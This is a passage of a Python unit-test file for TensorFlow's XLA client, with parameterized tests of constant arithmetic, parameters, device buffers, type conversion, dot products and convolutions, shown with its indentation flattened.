from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
# This import is only used for GPU; the dependency is incompatible with TPU
# so it results in an import error.
from tensorflow.python.framework import test_util
except ImportError:
test_util = None
# pylint: disable=g-import-not-at-top
try:
from tensorflow.compiler.xla.python import custom_call_for_test
except ImportError:
custom_call_for_test = None
bfloat16 = xla_client.bfloat16
ops = xla_client.ops
FLAGS = flags.FLAGS
# We choose to ignore pylint's complaints about complex comprehensions, which we
# use widely for parameterizing tests.
# pylint: disable=g-complex-comprehension
def TestFactory(xla_backend, cloud_tpu=False, tfrt_tpu=False):
tests = []
if not cloud_tpu:
int_dtypes = [np.int32, np.int64, np.uint32, np.uint64]
# TODO(phawkins): test np.float16, where supported.
float_dtypes = [bfloat16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
else:
int_dtypes = [np.int32, np.uint32]
float_dtypes = [np.float32]
complex_dtypes = [np.complex64]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
dlpack_dtypes = int_dtypes + float_dtypes + [np.bool_]
class ComputationTest(parameterized.TestCase):
"""Base class for running an XLA Computation through the local client."""
def setUp(self):
super(ComputationTest, self).setUp()
self.backend = xla_backend()
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.XlaBuilder(name)
def _Execute(self, c, arguments):
compiled_c = self.backend.compile(c.build())
return xla_client.execute_with_python_values(
compiled_c, arguments, backend=self.backend)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
results = self._Execute(c, arguments)
self.assertLen(results, len(expected))
for result, e in zip(results, expected):
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(e).shape)
assert_func(result, e)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments,
expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-4,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(absltest.TestCase):
def setUp(self):
super(ComputationPrinting, self).setUp()
self.backend = xla_backend()
def ExampleComputation(self):
builder = xla_client.XlaBuilder("acomputation")
p0 = ops.Parameter(builder, 0, xla_client.shape_from_pyval(np.float32(0)))
p1 = ops.Parameter(
builder, 1, xla_client.shape_from_pyval(np.zeros((4,), np.float32)))
x = ops.Mul(p0, p1)
ops.Add(x, x)
return builder.build()
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleToHloText(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleAsSerializedProto(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
proto = hlo_modules[0].as_serialized_hlo_module_proto()
hlo_module_roundtrip = xla_client.XlaComputation(proto).get_hlo_module()
hlo_text_roundtrip = hlo_module_roundtrip.to_string()
self.assertEqual(hlo_text, hlo_text_roundtrip)
@unittest.skipIf(cloud_tpu, "not implemented")
def testFlopEstimate(self):
computation = self.ExampleComputation()
properties = xla_client._xla.hlo_module_cost_analysis(
self.backend, computation.as_hlo_module())
self.assertEqual(properties["flops"], 8.0)
tests.append(ComputationPrinting)
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testConstantScalarSum(self, dtype):
if dtype == np.int8 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support int8")
c = self._NewComputation()
ops.Add(ops.Constant(c, dtype(1.11)), ops.Constant(c, dtype(3.14)))
self._ExecuteAndCompareClose(c, expected=[dtype(1.11) + dtype(3.14)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorMul(self, dtype):
c = self._NewComputation()
ops.Mul(
ops.Constant(c, np.array([2.5, 3.3, -1.2, 0.7], dtype)),
ops.Constant(c, np.array([-1.2, 2, -2, -3], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[-3, 6.6, 2.4, -2.1]], rtol=3e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarDiv(self, dtype):
c = self._NewComputation()
ops.Div(
ops.Constant(c, np.array([1.5, 2.5, 3.0, -10.8], dtype=dtype)),
ops.Constant(c, dtype(2.0)))
self._ExecuteAndCompareClose(
c, expected=[[0.75, 1.25, 1.5, -5.4]], rtol=2e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarPow(self, dtype):
c = self._NewComputation()
ops.Pow(
ops.Constant(c, np.array([1.5, 2.5, 3.0], dtype=dtype)),
ops.Constant(c, dtype(2.)))
self._ExecuteAndCompareClose(c, expected=[[2.25, 6.25, 9.]])
def testIota(self):
c = self._NewComputation()
ops.Iota(c, xla_client.PrimitiveType.F32, 10)
self._ExecuteAndCompareExact(
c, expected=[np.arange(10, dtype=np.float32)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testBroadcastedIota(self, dtype):
c = self._NewComputation()
shape = xla_client.Shape.array_shape(
xla_client.dtype_to_etype(dtype), (2, 3))
ops.Iota(c, shape, 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=dtype)
self._ExecuteAndCompareExact(c, expected=[expected])
def testBooleanAnd(self):
c = self._NewComputation()
ops.And(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, False]])
def testBooleanOr(self):
c = self._NewComputation()
ops.Or(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, True, True, False]])
def testBooleanXor(self):
c = self._NewComputation()
ops.Xor(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2D(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)),
ops.Constant(c, np.array([[1, -1, 1], [-1, 1, -1]], dtype=dtype)))
self._ExecuteAndCompareClose(c, expected=[[[2, 1, 4], [3, 6, 5]]])
def testShiftLeft(self):
c = self._NewComputation()
ops.ShiftLeft(
ops.Constant(c, NumpyArrayS32([3])),
ops.Constant(c, NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[[12]])
def testShiftRightArithmetic(self):
c = self._NewComputation()
ops.ShiftRightArithmetic(
ops.Constant(c, NumpyArrayS32([-2])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[-1]])
def testShiftRightLogical(self):
c = self._NewComputation()
ops.ShiftRightLogical(
ops.Constant(c, NumpyArrayS32([-1])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[2**31 - 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim0(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 12, 13], [24, 25, 26], [37, 38, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim1(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 22, 33], [14, 25, 36], [17, 28, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantAxpy(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Mul(
ops.Constant(c, dtype(2)),
ops.Constant(c, np.array([2.2, 3.3, 4.4, 5.5], dtype=dtype))),
ops.Constant(c, np.array([100, -100, 200, -200], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[104.4, -93.4, 208.8, -189]], rtol=2e-3)
def testCustomCall(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
ops.CustomCallWithLayout(
c,
b"test_subtract_f32",
operands=[
ops.Constant(c, np.float32(1.25)),
ops.Constant(c, np.float32(0.5))
],
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=[
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
])
self._ExecuteAndCompareClose(c, expected=[0.75])
tests.append(ComputationsWithConstantsTest)
class ComputationFromProtoTest(absltest.TestCase):
"""Test computation execution from HLO proto."""
def setUp(self):
super(ComputationFromProtoTest, self).setUp()
self.backend = xla_backend()
def testExecuteFromProto(self):
# Build the HLO proto
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
serialized_proto = b.build().as_serialized_hlo_module_proto()
# Load and execute the proto
c = xla_client.XlaComputation(serialized_proto)
ans, = xla_client.execute_with_python_values(
self.backend.compile(c), (), backend=self.backend)
np.testing.assert_equal(ans, np.int32(3))
tests.append(ComputationFromProtoTest)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testScalarTimesVector(self, dtype):
c = self._NewComputation()
arg0 = np.array(3, dtype=dtype)
arg1 = np.array([10, 15, -2, 7], dtype=dtype)
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.Mul(p0, p1)
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 * arg1])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testScalarMinusVectorExplicitNumbering(self, dtype):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
arg0 = np.array(2.0, dtype=dtype)
arg1 = np.array([-2.3, 3.3, -4.3, 5.3], dtype=dtype)
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
ops.Sub(p1, p0)
self._ExecuteAndCompareClose(
c, arguments=[arg0, arg1], expected=[arg1 - arg0])
tests.append(ParametersTest)
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def testConstantSum(self):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.float32(1.11)), ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(c, expected=[4.25])
def testOneParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=[4.25])
def testTwoParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0.))))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)],
expected=[4.25])
@unittest.skipIf(cloud_tpu, "not implemented")
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
arg = NumpyArrayF32(1.11)
compiled_c = self.backend.compile(c.build())
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.execute([arg_buffer])
def testXlaShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = self.backend.buffer_from_pyval(pyval)
xla_shape = local_buffer.xla_shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testBlockHostUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.block_host_until_ready()
# This test merely checks that nothing goes awry when we call
# block_host_until_ready(); it's difficult to test anything else.
def testBlockHostUntilReadyRaisesOnDeletedBuffer(self):
arg = np.array([[1., 2.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
buffer.delete()
with self.assertRaisesRegex(
RuntimeError,
re.escape(
"BlockHostUntilReady() called on deleted or donated buffer")):
buffer.block_host_until_ready()
def testDeviceArrayBaseSignatures(self):
# When extending `DeviceArrayBase`, the object behaves as a `DeviceArray`
# and thus needs to correctly implement the following methods.
arg = np.array([[1., 2., 3.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
if not isinstance(buffer, xla_client.DeviceArrayBase):
raise unittest.SkipTest(
"The objectof type {} do not extend DeviceArrayBase".format(
type(buffer)))
self.assertEqual(buffer.__array_priority__, 100)
self.assertEqual(buffer.shape, (1, 3))
self.assertEqual(buffer.dtype, np.float32)
self.assertEqual(buffer.size, 3)
self.assertEqual(buffer.ndim, 2)
self.assertIs(buffer, buffer.block_until_ready())
buffer.delete()
with self.assertRaises(RuntimeError):
buffer.block_until_ready()
def testOnDeviceSizeInBytes(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support OnDeviceSizeInBytes.")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertEqual(arg0_buffer.on_device_size_in_bytes(), 0)
# OnDeviceSizeInBytes varies depending on the platform. Confirm there's
# a reasonable value.
self.assertGreater(arg1_buffer.on_device_size_in_bytes(), 0)
self.assertGreater(arg2_buffer.on_device_size_in_bytes(), 0)
def testLiveBuffers(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support LiveBuffers().")
self.assertEmpty(self.backend.live_buffers())
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertLen(self.backend.live_buffers(), 3)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg1_buffer)
self.assertIs(self.backend.live_buffers()[2], arg0_buffer)
arg1_buffer.delete()
self.assertLen(self.backend.live_buffers(), 2)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg0_buffer)
arg0_buffer.delete()
arg2_buffer.delete()
self.assertEmpty(self.backend.live_buffers())
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8, dtype=np.int32)
for device in self.backend.local_devices():
buf = self.backend.buffer_from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
def testStandardTypes(self):
for dtype in standard_dtypes:
if dtype == bfloat16 or dtype == np.complex128:
continue
arr = self.backend.buffer_from_pyval(np.array([0, 1], dtype))
arr = arr.to_py()
self.assertEqual(dtype, type(arr[0]))
def testUnsafeBufferPointer(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support UnsafeBufferPointer().")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertGreaterEqual(arg0_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg1_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg2_buffer.unsafe_buffer_pointer(), 0)
@unittest.skipIf(cloud_tpu, "not implemented")
def testClone(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
z = y.clone()
self.assertNotEqual(id(x), id(y))
np.testing.assert_array_equal(y.to_py(), z.to_py())
self.assertEqual(y.unsafe_buffer_pointer(), z.unsafe_buffer_pointer())
@unittest.skipIf(cloud_tpu, "not implemented")
def testJaxAttributesHaveCorrectDefaults(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
self.assertIsNone(y.aval)
self.assertIsNone(y._device)
tests.append(BufferTest)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConcatenate(self, dtype):
c = self._NewComputation()
args = (
ops.Constant(c, np.array([1.0, 2.0, 3.0], dtype=dtype)),
ops.Constant(c, np.array([4.0, 5.0, 6.0], dtype=dtype)),
)
ops.ConcatInDim(c, args, dimension=0)
self._ExecuteAndCompareExact(
c, expected=[np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], dtype=dtype)])
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
} for src_dtype, dst_dtype in itertools.permutations(
[np.bool, np.int32, np.int64, np.float32, np.float64], 2))
# pyformat: enable
def testConvertElementType(self, src_dtype, dst_dtype):
if ((src_dtype in [np.int64, np.float64] or
dst_dtype in [np.int64, np.float64]) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.ConvertElementType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = np.array(x, dtype=dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# pyformat: disable
@parameterized.named_parameters(
{
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
}
for dtypes in [[np.int32, np.float32], [np.int64, np.float64]]
for src_dtype, dst_dtype in itertools.permutations(dtypes, 2))
# pyformat: enable
def testBitcastConvertType(self, src_dtype, dst_dtype):
if (np.float64 in (src_dtype, dst_dtype) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.BitcastConvertType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = x.view(dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
ops.AllToAll(ops.Constant(c, lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=[lhs])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(ops.Constant(c, lhs))
self._ExecuteAndCompareExact(c, expected=[lhs])
def testReplicaId(self):
c = self._NewComputation()
_ = ops.ReplicaId(c)
self._ExecuteAndCompareExact(c, expected=[0])
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(
ops.Constant(c, lhs), xla_client.make_replica_groups([[0]]))
self._ExecuteAndCompareExact(c, expected=[lhs])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixVector(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0], [20.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixMatrix(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0, 20.0], [100.0, 200.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
ops.DotGeneral(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
ops.ConvGeneralDilated(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NHWC", "OIHW", "CWNH"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, np.transpose(lhs,
(0, 2, 3, 1))), ops.Constant(c, rhs),
strides, pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(
c, expected=[np.transpose(result, (1, 3, 0, 2))])
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
feature_group_count = 2
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
